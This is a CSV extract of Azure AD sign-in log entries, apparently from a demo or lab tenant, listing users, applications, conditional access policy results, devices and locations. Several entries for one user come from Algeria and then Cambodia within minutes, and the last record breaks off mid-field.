+1574,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,53:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29592158-7166-406a-8157-9b7da4661331,Microsoft.aadiam,Microsoft.aadiam,,Yechiel Levin,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:53,"{'operatingSystem': 'Windows 10', 'deviceId': '8a35c785-7c5f-463a-ab5e-126c006191f1', 'browser': 'Edge 18.1836', 'displayName': 'YELEVIN-X1', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c5b94689-796f-4b24-973f-d9d352f32300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yechiel Levin,71505601-c694-45ce-8220-4799035a14f5,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c5b94689-796f-4b24-973f-d9d352f32300,SigninLogs,Sucess,32.0840416,34.88776016
+1575,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:22.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6a077436-f4af-496a-9510-bf30f8806af7,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5423bf62-9037-4448-bcaa-303341830600,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5423bf62-9037-4448-bcaa-303341830600,SigninLogs,Sucess,28,3
+1576,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,edec1ba0-2451-426a-aaf5-e20807bdb59c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 02:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",98dc8e9a-f4c7-40e8-8c8c-df651fcc0100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,98dc8e9a-f4c7-40e8-8c8c-df651fcc0100,SigninLogs,Sucess,36.6404686,-78.26995087
+1577,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9cae6bc9-488b-44de-a938-b85c59ebb98e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",89223cb6-60af-4a3e-b2e1-947006630700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,89223cb6-60af-4a3e-b2e1-947006630700,SigninLogs,Sucess,28,3
+1578,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:37.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",69bf3c7f-96b8-4aae-959c-a7bb27b50a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,69bf3c7f-96b8-4aae-959c-a7bb27b50a00,SigninLogs,Sucess,33.0175209,35.44601059
+1579,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,697e0704-61e9-4ace-b2db-48d036a86976,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",875c831a-2c9c-4e0a-b7c7-b83027f30600,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,875c831a-2c9c-4e0a-b7c7-b83027f30600,SigninLogs,Sucess,28,3
+1580,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:22.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7310f976-b66c-44b4-9c11-e3ef73e2a492,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:33,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",97e73a60-bce7-40f8-a302-e6813f913600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,97e73a60-bce7-40f8-a302-e6813f913600,SigninLogs,Sucess,38.47222137,-77.41989899
+1581,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:37.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2bf3270e-b5c4-45af-b9b1-7575546ed923,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure 